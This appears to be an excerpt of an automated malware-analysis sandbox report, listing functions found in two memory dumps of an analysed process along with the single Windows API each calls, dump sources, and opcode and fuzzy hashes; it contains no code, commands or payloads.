                                                    • Instruction Fuzzy Hash: 7521A1765093C09FEB128B25DC55A92BFF4EF07320F0984DBDD858F263D264A908DB61
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 028010D4, Relevance: 1.6, APIs: 1, Instructions: 65threadCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SetThreadUILanguage.KERNEL32(?), ref: 02801148
                                                    Memory Dump Source
                                                    • Source File: 00000020.00000002.2184399447.0000000002800000.00000040.00000001.sdmp, Offset: 02800000, based on PE: false
                                                    Similarity
                                                    • API ID: LanguageThread
                                                    • String ID:
                                                    • API String ID: 243849632-0
                                                    • Opcode ID: 18c7267b1d90969d714b0579a28ae766ad0da37f4acccdcf96b3b2fe89b1ed0d
                                                    • Instruction ID: 508dee2aad80bebcd19ac32ed22f590a90075b6358538c283fb4f798fd1a1747
                                                    • Opcode Fuzzy Hash: 18c7267b1d90969d714b0579a28ae766ad0da37f4acccdcf96b3b2fe89b1ed0d
                                                    • Instruction Fuzzy Hash: 28216D6550D3C49FE7138B259C54A62BFB4EF57720F0980DBD8898F2A3D2695808D772
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 006DAF62, Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • K32EnumProcessModules.KERNEL32(?,00000E9C,9CD4697E,00000000,00000000,00000000,00000000), ref: 006DAFBE
                                                    Memory Dump Source
                                                    • Source File: 00000020.00000002.2176791170.00000000006DA000.00000040.00000001.sdmp, Offset: 006DA000, based on PE: false
                                                    Similarity
                                                    • API ID: EnumModulesProcess
                                                    • String ID:
                                                    • API String ID: 1082081703-0
                                                    • Opcode ID: a6e57ab6c0ba6c24b22d3a2b6cfd3d2ff7885410a1914bf1a9677d21414f97a9
                                                    • Instruction ID: f881ace8fb19d292d46051d458df7e75dfa14b4b0853fe89b16ab4d515a881a4
                                                    • Opcode Fuzzy Hash: a6e57ab6c0ba6c24b22d3a2b6cfd3d2ff7885410a1914bf1a9677d21414f97a9
                                                    • Instruction Fuzzy Hash: 5B11BF72500300EFEB21DF55DC85BA6FBA8EF44720F1484AAE9098A281D670A9048BB2
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 02800886, Relevance: 1.6, APIs: 1, Instructions: 60fileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • ReadFile.KERNELBASE(?,00000E9C,9CD4697E,00000000,00000000,00000000,00000000), ref: 028008E5
                                                    Memory Dump Source
                                                    • Source File: 00000020.00000002.2184399447.0000000002800000.00000040.00000001.sdmp, Offset: 02800000, based on PE: false
                                                    Similarity
                                                    • API ID: FileRead
                                                    • String ID:
                                                    • API String ID: 2738559852-0
                                                    • Opcode ID: 30eeab947c626881e8301254774ffd4b3eb3fd8c13d92291b473df4792381761
                                                    • Instruction ID: f6fcf88feb4d9a8f652be8db4f719b8bd0a2317c22f8934330e0604daf574a72
                                                    • Opcode Fuzzy Hash: 30eeab947c626881e8301254774ffd4b3eb3fd8c13d92291b473df4792381761
                                                    • Instruction Fuzzy Hash: D111C17A400304EFFB21CF51DC85FA6FBE8EF14721F14856AEE499A281C671A504CBB1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 006DBA10, Relevance: 1.6, APIs: 1, Instructions: 60fileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CreateFileW.KERNELBASE(?,?,?,?,?,?,?), ref: 006DBA7E
                                                    Memory Dump Source
                                                    • Source File: 00000020.00000002.2176791170.00000000006DA000.00000040.00000001.sdmp, Offset: 006DA000, based on PE: false
                                                    Similarity
                                                    • API ID: CreateFile
                                                    • String ID:
                                                    • API String ID: 823142352-0
                                                    • Opcode ID: 291b2a9bd79d78ffc08373b32eb27140bc5d7b69319460e7b4e93685e71f1259
                                                    • Instruction ID: 2f50177bd39f2d071ab80bb91c6c19e5b8c98459f6262e29e83b54cb0dc782b3
                                                    • Opcode Fuzzy Hash: 291b2a9bd79d78ffc08373b32eb27140bc5d7b69319460e7b4e93685e71f1259
                                                    • Instruction Fuzzy Hash: B6118C72504384AFDB22CF65CC44A92FFF4EF05210F09849AE9898B662D375A818CB61
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 028012D8, Relevance: 1.6, APIs: 1, Instructions: 55COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SetConsoleTextAttribute.KERNEL32(?,?), ref: 0280132F
                                                    Memory Dump Source
                                                    • Source File: 00000020.00000002.2184399447.0000000002800000.00000040.00000001.sdmp, Offset: 02800000, based on PE: false
                                                    Similarity
                                                    • API ID: AttributeConsoleText
                                                    • String ID:
                                                    • API String ID: 646522457-0
                                                    • Opcode ID: 196d755cc878e1016cd41c0693111ad9462df693ea789122f9962d1576a8ddab
                                                    • Instruction ID: bf6f532ff3b470fdb47d20e0e1083af83fc667ff17d2850d00ece20c570af7a5
                                                    • Opcode Fuzzy Hash: 196d755cc878e1016cd41c0693111ad9462df693ea789122f9962d1576a8ddab
                                                    • Instruction Fuzzy Hash: CF1194755053849FDB118F65DC89B96FFE4EF06220F0984EEED498B262D375A408CB61
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 006DA33C, Relevance: 1.6, APIs: 1, Instructions: 55COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000020.00000002.2176791170.00000000006DA000.00000040.00000001.sdmp, Offset: 006DA000, based on PE: false
                                                    Similarity
                                                    • API ID: Flags
                                                    • String ID:
                                                    • API String ID: 3401871038-0
                                                    • Opcode ID: 64dcecd0cc4d76c59d820d999e6885f6eaccb0a753a53078a9cc69a80963f514
                                                    • Instruction ID: 4423789f58688989b17dbaf37814b024e252aa9ebbca8e1e75eead14673e71da
                                                    • Opcode Fuzzy Hash: 64dcecd0cc4d76c59d820d999e6885f6eaccb0a753a53078a9cc69a80963f514
                                                    • Instruction Fuzzy Hash: 78118C714093C49FEB128B25DC54AA2FFB4DF47624F0880CBEDC58F263D265A808DB62
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 028005E8, Relevance: 1.6, APIs: 1, Instructions: 54fileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • UnmapViewOfFile.KERNELBASE(?), ref: 02800640
                                                    Memory Dump Source
                                                    • Source File: 00000020.00000002.2184399447.0000000002800000.00000040.00000001.sdmp, Offset: 02800000, based on PE: false
                                                    Similarity
                                                    • API ID: FileUnmapView
                                                    • String ID:
                                                    • API String ID: 2564024751-0
                                                    • Opcode ID: 0941d819b3e710abffa4cc33c0d007f74bd21dba26c1dd0b6a8a70ed64bfbc5e
                                                    • Instruction ID: 387d08fec87ee132c64cf42695d53724323c0f142f5388d6393d176e852eaba1
                                                    • Opcode Fuzzy Hash: 0941d819b3e710abffa4cc33c0d007f74bd21dba26c1dd0b6a8a70ed64bfbc5e
                                                    • Instruction Fuzzy Hash: 7811E9755093C09FDB128B15DC95B52FFB4DF43220F0880DBED898B6A3D275A908DB62
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0280092F, Relevance: 1.6, APIs: 1, Instructions: 53COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetSystemInfo.KERNELBASE(?), ref: 0280099C
                                                    Memory Dump Source
                                                    • Source File: 00000020.00000002.2184399447.0000000002800000.00000040.00000001.sdmp, Offset: 02800000, based on PE: false
                                                    Similarity
                                                    • API ID: InfoSystem
                                                    • String ID:
                                                    • API String ID: 31276548-0
                                                    • Opcode ID: 42f0a86cfa20f9322e307e90e8858de744a35eddd668cd34b11c653a685fee95
                                                    • Instruction ID: 1dc2e7d3d51f69daf2f84fa56a434068d6c491ff720a0be202c0fc88fbb8ab5e
                                                    • Opcode Fuzzy Hash: 42f0a86cfa20f9322e307e90e8858de744a35eddd668cd34b11c653a685fee95
                                                    • Instruction Fuzzy Hash: 6311B2758093C49FE712CB25DC55B92FFB4EF07324F0980DADD888B163C265A908CB62
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 006DAAD2, Relevance: 1.6, APIs: 1, Instructions: 53COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • LookupPrivilegeValueW.ADVAPI32(?,?,?), ref: 006DAB1A
                                                    Memory Dump Source
                                                    • Source File: 00000020.00000002.2176791170.00000000006DA000.00000040.00000001.sdmp, Offset: 006DA000, based on PE: false
                                                    Similarity
                                                    • API ID: LookupPrivilegeValue
                                                    • String ID:
                                                    • API String ID: 3899507212-0
                                                    • Opcode ID: cbbe8ae23f29d8d842f77e1c46eab107da3a144cb454dd8b815abbe3ad3a4b3c
                                                    • Instruction ID: 9eb16cc1536a0d7bdd61ada62d2350a6cf9469512a498cce9e637672afc6ed62
                                                    • Opcode Fuzzy Hash: cbbe8ae23f29d8d842f77e1c46eab107da3a144cb454dd8b815abbe3ad3a4b3c
                                                    • Instruction Fuzzy Hash: 1B118271A043008FEB20CF65DC857A6FBD9EB14311F08846BDD09CB341D670E805CA62
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 006DAA0F, Relevance: 1.6, APIs: 1, Instructions: 53COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetConsoleOutputCP.KERNEL32 ref: 006DAA71
                                                    Memory Dump Source
                                                    • Source File: 00000020.00000002.2176791170.00000000006DA000.00000040.00000001.sdmp, Offset: 006DA000, based on PE: false
                                                    Similarity
                                                    • API ID: ConsoleOutput
                                                    • String ID:
                                                    • API String ID: 3985236979-0
                                                    • Opcode ID: e9c65295ebed1cbc45ab9b6cff95f7f8bfea5e9f4b9838743c5aeb8ad050058c
                                                    • Instruction ID: bcf33714330419c7826bd86173384d540535f85fb65d7d1a143016f6a63f4c04
                                                    • Opcode Fuzzy Hash: e9c65295ebed1cbc45ab9b6cff95f7f8bfea5e9f4b9838743c5aeb8ad050058c
                                                    • Instruction Fuzzy Hash: D111917540D7C09FE7128B15DC85A91BFB4EF13324F0980DBDD858F2A3D269A909D762
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 028007C6, Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetFileType.KERNELBASE(?,00000E9C,9CD4697E,00000000,00000000,00000000,00000000), ref: 02800819
                                                    Memory Dump Source
                                                    • Source File: 00000020.00000002.2184399447.0000000002800000.00000040.00000001.sdmp, Offset: 02800000, based on PE: false
                                                    Similarity
                                                    • API ID: FileType
                                                    • String ID:
                                                    • API String ID: 3081899298-0
                                                    • Opcode ID: c5e325b8f5205cee1cea6ed45803ae097173017120233e474a7c03698fb7db69
                                                    • Instruction ID: a80d6abf988eb4f1b9d8ae4041025c5838084b0eeb9897751698688d801df6b6
                                                    • Opcode Fuzzy Hash: c5e325b8f5205cee1cea6ed45803ae097173017120233e474a7c03698fb7db69
                                                    • Instruction Fuzzy Hash: 7B01D27A500304EFFB20DF11DC85FA6FB98EF04721F14C096ED099B281D674A904CAB6
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 028013AA, Relevance: 1.6, APIs: 1, Instructions: 51COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000020.00000002.2184399447.0000000002800000.00000040.00000001.sdmp, Offset: 02800000, based on PE: false
                                                    Similarity
                                                    • API ID: ConsoleWrite
                                                    • String ID:
                                                    • API String ID: 2657657451-0
                                                    • Opcode ID: 28b003a9f1343ad8fd836473fe3e61324c0c6385156091225c6c65a47677e68a
                                                    • Instruction ID: fb78f521d51c80b7cf168bc00643dc9443c9c1848cfba07e1b88a609c3d66045
                                                    • Opcode Fuzzy Hash: 28b003a9f1343ad8fd836473fe3e61324c0c6385156091225c6c65a47677e68a
                                                    • Instruction Fuzzy Hash: 29117C7A500700DBEB60CF55DC89B66FBA4EB04720F08C4AADD49CB691D375E418CA61
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 006DAB75, Relevance: 1.6, APIs: 1, Instructions: 50COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetLogicalDrives.KERNELBASE ref: 006DABC9
                                                    Memory Dump Source
                                                    • Source File: 00000020.00000002.2176791170.00000000006DA000.00000040.00000001.sdmp, Offset: 006DA000, based on PE: false
                                                    Similarity
                                                    • API ID: DrivesLogical
                                                    • String ID:
                                                    • API String ID: 999431828-0
                                                    • Opcode ID: e641b13f8f30c3aa1ac32c51af9585bd103aae0b55a8dc44764540d337e3b3cc
                                                    • Instruction ID: 46fb9b026a68da1556c93320a9346e4923807f3202afd953ea4139ad0cbf9e0e
                                                    • Opcode Fuzzy Hash: e641b13f8f30c3aa1ac32c51af9585bd103aae0b55a8dc44764540d337e3b3cc
                                                    • Instruction Fuzzy Hash: 9A1182B59093809FDB11CF55DC85B92FFA4EF52324F0980ABDD498F253D275A908CB62
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 006DBA32, Relevance: 1.5, APIs: 1, Instructions: 49fileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CreateFileW.KERNELBASE(?,?,?,?,?,?,?), ref: 006DBA7E
                                                    Memory Dump Source
                                                    • Source File: 00000020.00000002.2176791170.00000000006DA000.00000040.00000001.sdmp, Offset: 006DA000, based on PE: false
                                                    Similarity
                                                    • API ID: CreateFile
                                                    • String ID:
                                                    • API String ID: 823142352-0
                                                    • Opcode ID: f36263dff440536c0bf711a1e384e860bda95058194bfede19aba43ea342300a
                                                    • Instruction ID: ea6b75cea3dd6b029b7316ae37943514c771951f9d629f80fc529da84fbadef0
                                                    • Opcode Fuzzy Hash: f36263dff440536c0bf711a1e384e860bda95058194bfede19aba43ea342300a
                                                    • Instruction Fuzzy Hash: 8511A172900704DFEB20CF55DC44B52FBE5EF14310F0884AADD498A716D371E414DB61
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 02800196, Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SetConsoleTitleW.KERNEL32(?), ref: 028001D0
                                                    Memory Dump Source
                                                    • Source File: 00000020.00000002.2184399447.0000000002800000.00000040.00000001.sdmp, Offset: 02800000, based on PE: false
                                                    Similarity
                                                    • API ID: ConsoleTitle
                                                    • String ID:
                                                    • API String ID: 3358957663-0
                                                    • Opcode ID: 9607dc54837ddd7d275fb2c8de266582ee06727b48b980d31e10ac76deb8527f
                                                    • Instruction ID: 1d0e780440a19a8972f31dc6ad9d790b7d6d2342ad38376564e4f8f2d13b8a9c
                                                    • Opcode Fuzzy Hash: 9607dc54837ddd7d275fb2c8de266582ee06727b48b980d31e10ac76deb8527f
                                                    • Instruction Fuzzy Hash: 82019E79600344CFEB50DF69DC857A6FBA8DF05225F0884AADC09CB682D774E844CA62
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0280104E, Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetVolumeInformationW.KERNELBASE(?,00000E9C,?,?), ref: 0280109E
                                                    Memory Dump Source
                                                    • Source File: 00000020.00000002.2184399447.0000000002800000.00000040.00000001.sdmp, Offset: 02800000, based on PE: false
                                                    Similarity
                                                    • API ID: InformationVolume
                                                    • String ID:
                                                    • API String ID: 2039140958-0
                                                    • Opcode ID: e2d7dfbd132c5b3d2df5056cae2b65a5ddce61bd2c44c19211ed1361938c9996
                                                    • Instruction ID: b3f86b5bc82fa0a64680d1b326e2363b9f3b3a60811b5b6ea648a2e3fdadebfa
                                                    • Opcode Fuzzy Hash: e2d7dfbd132c5b3d2df5056cae2b65a5ddce61bd2c44c19211ed1361938c9996
                                                    • Instruction Fuzzy Hash: AA017171900600ABE310DF16DC46B66FBA8FB84B20F14816AED099B741D375B515CBE5
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 006DA1EE, Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SetConsoleCtrlHandler.KERNEL32(?,00000E9C,?,?), ref: 006DA23E
                                                    Memory Dump Source
                                                    • Source File: 00000020.00000002.2176791170.00000000006DA000.00000040.00000001.sdmp, Offset: 006DA000, based on PE: false
                                                    Similarity
                                                    • API ID: ConsoleCtrlHandler
                                                    • String ID:
                                                    • API String ID: 1513847179-0
                                                    • Opcode ID: 7717fd66a5d06a6800f8b551f9384569df6397ffd8f315ec743a63ae588b9e5e
                                                    • Instruction ID: 80b69ce7b9464bdee16bbc1554b26ab11868bd52380d967135464c34a8855acf
                                                    • Opcode Fuzzy Hash: 7717fd66a5d06a6800f8b551f9384569df6397ffd8f315ec743a63ae588b9e5e
                                                    • Instruction Fuzzy Hash: B0017171900600ABE710DF16DC46B66FBA8FB84A20F14816AED089B741D275B515CBE5
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 028012FA, Relevance: 1.5, APIs: 1, Instructions: 44COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SetConsoleTextAttribute.KERNEL32(?,?), ref: 0280132F
                                                    Memory Dump Source
                                                    • Source File: 00000020.00000002.2184399447.0000000002800000.00000040.00000001.sdmp, Offset: 02800000, based on PE: false
                                                    Similarity
                                                    • API ID: AttributeConsoleText
                                                    • String ID:
                                                    • API String ID: 646522457-0
                                                    • Opcode ID: 87a1742de031fbd5dc4634cec3c6e5553094304898db5821f7c6116a1f39faa5
                                                    • Instruction ID: 28bec14b85857366f30dacda61b60444570155334e30b79e362b24929f0d6549
                                                    • Opcode Fuzzy Hash: 87a1742de031fbd5dc4634cec3c6e5553094304898db5821f7c6116a1f39faa5
                                                    • Instruction Fuzzy Hash: E801BC7A500304DFEF508F15DC897A5FBA4EF04720F08C4AADD09CB692D279A404CB61
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 006DBAFA, Relevance: 1.5, APIs: 1, Instructions: 44COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetConsoleScreenBufferInfo.KERNEL32 ref: 006DBB2F
                                                    Memory Dump Source
                                                    • Source File: 00000020.00000002.2176791170.00000000006DA000.00000040.00000001.sdmp, Offset: 006DA000, based on PE: false
                                                    Similarity
                                                    • API ID: BufferConsoleInfoScreen
                                                    • String ID:
                                                    • API String ID: 3437242342-0
                                                    • Opcode ID: c7892f0d89fd6ce7565fe0b5d90ff6fc0ceb850b8dd434d55fa6e6da506fe555
                                                    • Instruction ID: e7d9e4001d4d2e2afcdc0c8d259b81edac934e164fca1cb65b642f07ddc80fbe
                                                    • Opcode Fuzzy Hash: c7892f0d89fd6ce7565fe0b5d90ff6fc0ceb850b8dd434d55fa6e6da506fe555
                                                    • Instruction Fuzzy Hash: 5501BC75900200DFEB208F15DC857A5FBA4EF04720F08C4ABDD098B35AD775A804CBA1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 028004B2, Relevance: 1.5, APIs: 1, Instructions: 43COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SHGetFolderPathW.SHELL32(?,00000E9C,?,?), ref: 02800502
                                                    Memory Dump Source
                                                    • Source File: 00000020.00000002.2184399447.0000000002800000.00000040.00000001.sdmp, Offset: 02800000, based on PE: false
                                                    Similarity
                                                    • API ID: FolderPath
                                                    • String ID:
                                                    • API String ID: 1514166925-0
                                                    • Opcode ID: ce9c7ebe2d2741bdaa1e6ef9a3e6ffe135c20a5dd3921d3cc6eac39b6b536ea6
                                                    • Instruction ID: b67c7ebf68c33855d42b53031488da335b8a22dafd58a26ecf40c28fccb44652
                                                    • Opcode Fuzzy Hash: ce9c7ebe2d2741bdaa1e6ef9a3e6ffe135c20a5dd3921d3cc6eac39b6b536ea6
                                                    • Instruction Fuzzy Hash: 0C016271900601ABE310DF16DC46F26FBB4FB88B20F14815AED085B741D275F515CBE6
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 02800F76, Relevance: 1.5, APIs: 1, Instructions: 43COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetDriveTypeW.KERNELBASE(?), ref: 02800FB0
                                                    Memory Dump Source
                                                    • Source File: 00000020.00000002.2184399447.0000000002800000.00000040.00000001.sdmp, Offset: 02800000, based on PE: false
                                                    Similarity
                                                    • API ID: DriveType
                                                    • String ID:
                                                    • API String ID: 338552980-0
                                                    • Opcode ID: 3b292d14028339e11104fb0c6ea8d2232d9c84580c46ebbd80d805adf0bc733e
                                                    • Instruction ID: 763404bd8183aa6eefb8f55d0520583647fe9e2d7b367d9297f81a85a7bb327c
                                                    • Opcode Fuzzy Hash: 3b292d14028339e11104fb0c6ea8d2232d9c84580c46ebbd80d805adf0bc733e
                                                    • Instruction Fuzzy Hash: C501B879904344CFEB60DF19DC85B66FBA4EB01224F0880AADC08CF686D374E408CAA2
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 006DA8FA, Relevance: 1.5, APIs: 1, Instructions: 43threadCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SetThreadPreferredUILanguages.KERNEL32(?,00000E9C,?,?), ref: 006DA94A
                                                    Memory Dump Source
                                                    • Source File: 00000020.00000002.2176791170.00000000006DA000.00000040.00000001.sdmp, Offset: 006DA000, based on PE: false
                                                    Similarity
                                                    • API ID: LanguagesPreferredThread
                                                    • String ID:
                                                    • API String ID: 842807343-0
                                                    • Opcode ID: 5c13e4941600ba2387d54b4c6ce7dfb7cdbbfd61702e1317e56e2122b0b24114
                                                    • Instruction ID: a40480add48db298f219480f6b8cca56c93f9ca83f66237648346facffc504df
                                                    • Opcode Fuzzy Hash: 5c13e4941600ba2387d54b4c6ce7dfb7cdbbfd61702e1317e56e2122b0b24114
                                                    • Instruction Fuzzy Hash: 0C016271900601ABE310DF16DC46B26FBB4FB88B20F14815AED085B741D275F515CBE6
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0280060E, Relevance: 1.5, APIs: 1, Instructions: 39fileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • UnmapViewOfFile.KERNELBASE(?), ref: 02800640
                                                    Memory Dump Source
                                                    • Source File: 00000020.00000002.2184399447.0000000002800000.00000040.00000001.sdmp, Offset: 02800000, based on PE: false
                                                    Similarity
                                                    • API ID: FileUnmapView
                                                    • String ID:
                                                    • API String ID: 2564024751-0
                                                    • Opcode ID: 2d5e25cb194748d3401bd5f42daca7483232feb6839fc1374a9983ef2a5b79a9
                                                    • Instruction ID: 552e94058fcbf75dfaf6aae496db0ff2b3c13340aa6e8d6a913ee432a8be1cb1
                                                    • Opcode Fuzzy Hash: 2d5e25cb194748d3401bd5f42daca7483232feb6839fc1374a9983ef2a5b79a9
                                                    • Instruction Fuzzy Hash: C601F479600704CFEB508F55DCC5761FBA0DF41725F08C0AADD5A8B792D374E408DAA2
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 006DAB9A, Relevance: 1.5, APIs: 1, Instructions: 38COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetLogicalDrives.KERNELBASE ref: 006DABC9
                                                    Memory Dump Source
                                                    • Source File: 00000020.00000002.2176791170.00000000006DA000.00000040.00000001.sdmp, Offset: 006DA000, based on PE: false
                                                    Similarity
                                                    • API ID: DrivesLogical
                                                    • String ID:
                                                    • API String ID: 999431828-0
                                                    • Opcode ID: 3555b684e39990a78789711d10d9064e7eec14520419cc80360775b847015632
                                                    • Instruction ID: 03f09b023f181ab67b1247108e7228298ecdb9af8a41bbaad836a0a99aa7ffbb
                                                    • Opcode Fuzzy Hash: 3555b684e39990a78789711d10d9064e7eec14520419cc80360775b847015632
                                                    • Instruction Fuzzy Hash: 6901D175808340CFEB10DF95D885791FBA4DF00321F18C0ABCD098F342D275A405CBA2
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 02801116, Relevance: 1.5, APIs: 1, Instructions: 36threadCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SetThreadUILanguage.KERNEL32(?), ref: 02801148
                                                    Memory Dump Source
                                                    • Source File: 00000020.00000002.2184399447.0000000002800000.00000040.00000001.sdmp, Offset: 02800000, based on PE: false
                                                    Similarity
                                                    • API ID: LanguageThread
                                                    • String ID:
                                                    • API String ID: 243849632-0
                                                    • Opcode ID: e7dbfebd40999b602db247e2edf9b3e070b1576b929b47919f1c121953eecc88
                                                    • Instruction ID: 5f4a832201c228e98294c4eeb2c9f67e1c61b280aa7eebb12967d29a5d432a3a
                                                    • Opcode Fuzzy Hash: e7dbfebd40999b602db247e2edf9b3e070b1576b929b47919f1c121953eecc88
                                                    • Instruction Fuzzy Hash: 4AF08C3D500644DFEB608F05DCC9765FBA4EB05B25F08C09ADD4D8B792D675A848CAA2
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0280096A, Relevance: 1.5, APIs: 1, Instructions: 35COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetSystemInfo.KERNELBASE(?), ref: 0280099C
                                                    Memory Dump Source
                                                    • Source File: 00000020.00000002.2184399447.0000000002800000.00000040.00000001.sdmp, Offset: 02800000, based on PE: false
                                                    Similarity
                                                    • API ID: InfoSystem
                                                    • String ID:
                                                    • API String ID: 31276548-0
                                                    • Opcode ID: 9aff82725adc1dc2902d061efa4eb9ac52c337672b97a7002d88e0a50438bb41
                                                    • Instruction ID: 3029697ea2f14c7dd2c49930749b0a7f85a91418565359cc04ccda5a296ae6d8
                                                    • Opcode Fuzzy Hash: 9aff82725adc1dc2902d061efa4eb9ac52c337672b97a7002d88e0a50438bb41
                                                    • Instruction Fuzzy Hash: D5F0AF39904744DFFB609F05DC85765FBA0EF15726F08C09ADD498B396D375A408CAA2
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 006DA36A, Relevance: 1.5, APIs: 1, Instructions: 35COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000020.00000002.2176791170.00000000006DA000.00000040.00000001.sdmp, Offset: 006DA000, based on PE: false
                                                    Similarity
                                                    • API ID: Flags
                                                    • String ID:
                                                    • API String ID: 3401871038-0
                                                    • Opcode ID: bedb89556b6ff599c64c3076fba329d6e2fe16288d8803110e4e512f6d4dccca
                                                    • Instruction ID: da42f07c3597beca7eca22865efdb7c4fdc7b3f056a4c427ab4dddaa70e4a7b0
                                                    • Opcode Fuzzy Hash: bedb89556b6ff599c64c3076fba329d6e2fe16288d8803110e4e512f6d4dccca
                                                    • Instruction Fuzzy Hash: 98F0C235908744DFEB20DF45D885765FBA2EF04721F18C09BDD098B352D375E818DAA2
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 006DAA42, Relevance: 1.5, APIs: 1, Instructions: 34COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetConsoleOutputCP.KERNEL32 ref: 006DAA71
                                                    Memory Dump Source
                                                    • Source File: 00000020.00000002.2176791170.00000000006DA000.00000040.00000001.sdmp, Offset: 006DA000, based on PE: false
                                                    Similarity
                                                    • API ID: ConsoleOutput
                                                    • String ID:
                                                    • API String ID: 3985236979-0
                                                    • Opcode ID: 384611afc0ec6283a3bd29f710e0e76158a28841958c0db2067262ab8b9d1f0c
                                                    • Instruction ID: cac82be39b0730b6e4e8a2ef9cc32f0f0050ed6d36f90c897a44c5c19a9a01f8
                                                    • Opcode Fuzzy Hash: 384611afc0ec6283a3bd29f710e0e76158a28841958c0db2067262ab8b9d1f0c
                                                    • Instruction Fuzzy Hash: 2FF0C235904740CFEB10CF55D985761FBA0DF04721F58C19BDD094B352D275A904CAA2
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 006DA974, Relevance: 1.3, APIs: 1, Instructions: 54COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CloseHandle.KERNELBASE(?), ref: 006DA9C8
                                                    Memory Dump Source
                                                    • Source File: 00000020.00000002.2176791170.00000000006DA000.00000040.00000001.sdmp, Offset: 006DA000, based on PE: false
                                                    Similarity
                                                    • API ID: CloseHandle
                                                    • String ID:
                                                    • API String ID: 2962429428-0
                                                    • Opcode ID: 8fdf54e7578e8743a2195ac4c8dce4e545e44892b9bef4aa81f24ce0a7840ff4
                                                    • Instruction ID: e2222d82d5880746308bdc7e45f57bb2598348d5990631927d7e04ea42daae1a
                                                    • Opcode Fuzzy Hash: 8fdf54e7578e8743a2195ac4c8dce4e545e44892b9bef4aa81f24ce0a7840ff4
                                                    • Instruction Fuzzy Hash: CF11A3755093849FD711CF65DC45B92FFA4DF02220F0980EBED458F262D275A808CB62
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 006DA996, Relevance: 1.3, APIs: 1, Instructions: 43COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CloseHandle.KERNELBASE(?), ref: 006DA9C8
                                                    Memory Dump Source
                                                    • Source File: 00000020.00000002.2176791170.00000000006DA000.00000040.00000001.sdmp, Offset: 006DA000, based on PE: false
                                                    Similarity
                                                    • API ID: CloseHandle
                                                    • String ID:
                                                    • API String ID: 2962429428-0
                                                    • Opcode ID: 6fa12e6c30940c475551ed802609d85793d5b968f6431d2fcefc5fb0bc7644cb
                                                    • Instruction ID: c2268e2af7f92960e9365c75e9779f154cfdc04aeaadf3b332d31e659aa87cba
                                                    • Opcode Fuzzy Hash: 6fa12e6c30940c475551ed802609d85793d5b968f6431d2fcefc5fb0bc7644cb
                                                    • Instruction Fuzzy Hash: 6701DB75A04640CFEB10DF66D8897A6FBA4EF00320F18C0ABDD098F346D275A808CB62
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 029007F7, Relevance: .0, Instructions: 44COMMON
